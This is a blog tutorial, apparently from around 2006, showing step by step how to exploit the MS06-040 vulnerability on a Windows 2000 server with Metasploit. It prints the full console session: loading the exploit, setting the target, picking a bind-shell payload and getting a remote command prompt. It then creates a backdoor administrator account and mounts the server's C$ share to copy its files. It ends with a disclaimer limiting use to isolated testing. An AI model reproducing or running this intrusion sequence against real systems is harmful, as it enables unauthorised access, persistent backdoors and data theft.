[Do] you know actually how easy it is ?
Myth Number 1: You need to be Linux literate to hack. It is true that many hacking tools are built for *nix, and many will say they are the best (heck I’m using Linux now, so I’m not going to argue!) but many tools have been ported to windows (or Mac if you prefer), and if you think your average help-desk junkie is fairly windows literate, how difficult is it to point & click ? – are you concerned yet ?
Myth Number 2: Hacking is hard. Proper hacking – finding exploits in code yes, but what the public means as hacking, like copying files off your PC, no. I’m going to show you how to use a windows PC to Hack a vulnerable server, create an administrator account which will allow you to copy the contents of the severs hard drive.
OK, so exploit in the wild means, a popular hacking website has published a working exploit, in the case of MS06-040 Milw0rm did, here. What made this exploit interesting is that it was published as part of the popular pen testing tool Metasploit, which yep you guessed it, runs on windows !
So to get started, download and install metasploit (I’ll be using Framework 2.6).
See my previous post “Hacking – MSO6-040 Metasploit Download!!”
Once that’s installed you’ll need to update it with the latest available exploits, so click start -> metasploit framework -> msfupdate , and watch it do it’s thing. (for Linux or mac people you need to run msfupdate -u.) During the update you’ll see that it downloads netapi_ms06_040.pm, in windows world you have to be quick, as the window closes when it’s finished updating, but linuxy’s will be able to see, this is the exploit as published on Milw0rm.
Intrigued? Follow the white rabbit—>
Now there is a web GUI to metasploit framework, but (i) I didn’t find it that easy to use & (ii) it’s quite difficult to write an article saying point & click , so to hack (and I use the term loosely) we’re going to use the console, which is a little like a router console, limited commands not as overwhelming as a full command shell/terminal. So windows users start -> metspolit framework -> msfconsole (mac & Linux, just type msfconsole), and you’ll get a black box that looks a little like this:888 888 d8b888 888 888 Y8P888 888 888 888 88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888 888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888 888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888 888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b. 888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888 888 888 888 + -- --=[ msfconsole v2.6 [153 exploits - 76 payloads] msf >
So to get started, you can just type help to see a list of commands:msf > help Metasploit Framework Main Console Help ====================================== ? Show the main console help cd Change working directory exit Exit the console help Show the main console help info Display detailed exploit or payload information quit Exit the console reload Reload exploits and payloads save Save configuration to disk setg Set a global environment variable show Show available exploits and payloads unsetg Remove a global environment variable use Select an exploit by name version Show console version
show exploits will give a list of available exploits, and we want netapi_ms06_040, so type use netapi_ms06_040, notice how the prompt has changed :msf> use netapi_ms06_040 msf netapi_ms06_040 >
Right the next thing you need is something to attack, now I’ve got a windows 2000 server sp4 waiting with an ip address of 192.168.10.121, so to tell metasploit what to attack, you need to set a remote host variable. For the unfamiliar a variable is a word that represents something (I’m not a programmer so sorry for the crap definition), so we’re gonna set the word RHOSTto 192.168.10.121:msf netapi_ms06_040 >set RHOST 192.168.10.120 RHOST -> 192.168.10.120 msf netapi_ms06_040 >
The final thing to do is to set up a payload. A payload is what you want to happen after you’ve exploited, show payloads :msf netapi_ms06_040 > show payloads Metasploit Framework Usable Payloads ==================================== win32_adduser Windows Execute net user /ADD win32_bind Windows Bind Shell win32_bind_dllinject Windows Bind DLL Inject win32_bind_meterpreter Windows Bind Meterpreter DLL Inject win32_bind_stg Windows Staged Bind Shell win32_bind_stg_upexec Windows Staged Bind Upload/Execute win32_bind_vncinject Windows Bind VNC Server DLL Inject win32_downloadexec Windows Executable Download and Execute win32_exec Windows Execute Command win32_reverse Windows Reverse Shell win32_reverse_dllinject Windows Reverse DLL Inject win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject win32_reverse_ord Windows Staged Reverse Ordinal Shell win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject win32_reverse_stg Windows Staged Reverse Shell win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute win32_reverse_vncinject Windows Reverse VNC Server Inject
Gives a nice list of what’s available, anything from command shells to full vnc guis. I’m going to pick the simplest which is win32_bind, when successful, this will change our metasploit console into a command prompt (start -> run -cmd.exe) on the attacked machine, thus allowing us to run any commands we like !msf netapi_ms06_040 >set PAYLOAD win32_bind PAYLOAD -> win32_bind msf netapi_ms06_040(win32_bind) >
Before we go any further it’s best to check we’ve got everything; the show options command is massively useful because it show us what settings (or variables) we need before an exploit will work.msf netapi_ms06_040(win32_bind) > show options Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------- -------------- --------------------------------------- required RHOST 192.168.10.121 The target address optional SMBDOM The domain for specified SMB username optional SMBUSER The SMB username to connect with optional SMBPASS The password for specified SMB username Payload: Name Default Description -------- -------- ------- ------------------------------------------ required EXITFUNC thread Exit technique: "process", "thread", "seh" required LPORT 4444 Listening port for bind shell Target: (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1) msf netapi_ms06_040(win32_bind) >
As you can see we set the required RHOST, the others are optional (so we’ll ignore them) and the other required have been sorted for us
So the final touch is to hack ! Type exploitmsf netapi_ms06_040(win32_bind) > exploit [*] Starting Bind Handler. [*] Detected a Windows 2000 target [*] Sending request... [*] Got connection from 192.168.10.119:45064 <-> 192.168.10.121:4444 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:WINNTsystem32>
Success ! (pat your self on the back!) you now have a working command line, now if you’re not that literate with windows command line you may think, so what !?!?! Well take a look at the following, we’ll set up a user called h4×0r, with password P455w0rd, and add him/her to the administrators group:C:WINNTsystem32>net user h4x0r P455w0rd /add net user h4x0r P455w0rd /add The command completed successfully. C:WINNTsystem32>net localgroup administrators h4x0r /add net localgroup administrators h4x0r /add The command completed successfully. C:WINNTsystem32>net localgroup administrators net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator h4x0r The command completed successfully. C:WINNTsystem32>
Now we have an administrator on that machine we can pretty much do what we like, so you windows users can mount the “C” drive as a remote hard drive and copy & read any file you like. So from your pc where metasploit is installed click start -> run , type cmd.exe; notice how the shell looks the same as the metasploit one ? and typenet use x: 192.168.10.121c$ P455w0rd /user:h4x0r
Finally windows people, under the “My Computer” of your machine you have an “X” drive of the server you attacked ! (Linux users you’ll have to use Samba to do the same, sorry Mac’ers I don’t know for you!)
Many Many Thanks to www.linickx.com for such a beautifully written and easy to follow “How To” on the latest MS security threat. Keep this knowledge free and we might just one day have a secure Windows OS. I’m just kidding, that’ll never happen. However, people will start regularly running windows update.
*Disclaimer/Warning – This post is for people to study the possible vulnerabilities of the Windows OS. It is NOT intended to act as a guideline for those that would use these security testing tools maliciously. WARNING: DO NOT UTILIZE THIS EXPLOIT FOR ANY OTHER REASON THAN TO TEST OS SECURITY IN A COMPLETE STAND ALONE ENVIRONMENT, I WILL NOT BE HELD RESPONSIBLE FOR THE ACTIONS OF THOSE THAT USE THIS INFORMATION TO BREAK THE LAW.